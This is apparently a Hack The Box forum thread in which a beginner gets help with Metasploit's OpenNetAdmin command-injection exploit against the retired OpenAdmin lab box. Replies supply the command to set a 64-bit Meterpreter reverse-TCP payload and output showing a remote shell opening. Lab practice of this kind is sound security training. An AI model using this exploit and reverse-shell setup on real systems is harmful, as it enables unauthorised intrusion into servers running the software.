HTB---OpenAdmin:no session was created.

I use the module in MSF to attack the target machine, but when I execute it, it shows that the session cannot be created. Is there any solution?

This is my setting

This is my execution result
Snipaste_2021-01-26_18-18-32.png

try the x64 linux meterpreter payload if the x86 isn’t working

@Ershu1 said:

I use the module in MSF to attack the target machine, but when I execute it, it shows that the session cannot be created. Is there any solution?

This is a retired box so there are walkthroughs available and there is already a thread where this question would be better placed.

The vast majority of walkthroughs use a different approach and if you look at: Walk-through of OpenAdmin (Hack the Box) – Blog they also found MSF failed to work.

I think the other options are more effective. I certainly cant get a shell with MSF on this box now (you could last year when it was first active, that might have been patched as an unintended method).

it still works. it just doesn’t work with the x86 payload.
granted, boxes have their own minds sometimes, but it’s not patched.

@HcKy said:

it still works. it just doesn’t work with the x86 payload.
granted, boxes have their own minds sometimes, but it’s not patched.

Nice one - thanks for the clarification.

Type your comment> @HcKy said:

try the x64 linux meterpreter payload if the x86 isn’t working

Ok i will try it, thanks for your suggestion

@HcKy said:
try the x64 linux meterpreter payload if the x86 isn’t working

But there is only one Payoad related to OpenNetAdmin in msf
Where should the x64 payload be found,could you please tell me?
Sorry, I just started playing this and I’m not sure

@TazWake said:
@Ershu1 said:

I use the module in MSF to attack the target machine, but when I execute it, it shows that the session cannot be created. Is there any solution?

This is a retired box so there are walkthroughs available and there is already a thread where this question would be better placed.

The vast majority of walkthroughs use a different approach and if you look at: Walk-through of OpenAdmin (Hack the Box) – Blog they also found MSF failed to work.

I think the other options are more effective. I certainly cant get a shell with MSF on this box now (you could last year when it was first active, that might have been patched as an unintended method).

Ok, I will try other methods too, thank you for suggesting me again???

@Ershu1 said:

@HcKy said:
try the x64 linux meterpreter payload if the x86 isn’t working

But there is only one Payoad related to OpenNetAdmin in msf
Where should the x64 payload be found,could you please tell me?
Sorry, I just started playing this and I’m not sure

You can set your own payload with:
set payload linux/x64/meterpreter/reverse_tcp

I can confirm that works - right now -:

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.14.34:4444 
[*] Exploiting...
[*] Sending stage (3008420 bytes) to 10.10.10.171
[*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.171:37460) at 2021-01-26 14:27:34 +0000

Type your comment> @Ershu1 said:

@HcKy said:
try the x64 linux meterpreter payload if the x86 isn’t working

But there is only one Payoad related to OpenNetAdmin in msf
Where should the x64 payload be found,could you please tell me?
Sorry, I just started playing this and I’m not sure

msf.PNG

But as some additional info the exploits are different than the payloads in metasploit. (and in general). You can see them by doing a “show payloads”

You’re using exploits to make the machine do something unintended by the developer. (like uploading a reverse shell or performing a DOS attack)

There’s all sorts of different payloads you can use along with the exploits, except for when the exploit doesn’t allow for them obviously.

This one specifically doesn’t work with the 32 bit version of linux payload so you have to use the 64 bit. Metasploit just defaults to the 32 bit payload when you select the exploit.

Type your comment> @TazWake said:

@Ershu1 said:

@HcKy said:
try the x64 linux meterpreter payload if the x86 isn’t working

But there is only one Payoad related to OpenNetAdmin in msf
Where should the x64 payload be found,could you please tell me?
Sorry, I just started playing this and I’m not sure

You can set your own payload with:
set payload linux/x64/meterpreter/reverse_tcp

I can confirm that works - right now -:

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.14.34:4444 
[*] Exploiting...
[*] Sending stage (3008420 bytes) to 10.10.10.171
[*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.171:37460) at 2021-01-26 14:27:34 +0000

Great, I successfully created a session, thank you again for your help

@HcKy said:
Type your comment> @Ershu1 said:

@HcKy said:
try the x64 linux meterpreter payload if the x86 isn’t working

But there is only one Payoad related to OpenNetAdmin in msf
Where should the x64 payload be found,could you please tell me?
Sorry, I just started playing this and I’m not sure

But as some additional info the exploits are different than the payloads in metasploit. (and in general). You can see them by doing a “show payloads”

You’re using exploits to make the machine do something unintended by the developer. (like uploading a reverse shell or performing a DOS attack)

There’s all sorts of different payloads you can use along with the exploits, except for when the exploit doesn’t allow for them obviously.

This one specifically doesn’t work with the 32 bit version of linux payload so you have to use the 64 bit. Metasploit just defaults to the 32 bit payload when you select the exploit.

Okay, thank you for your explanation, let me know why I couldn’t create a session successfully,
Respect to HcKy???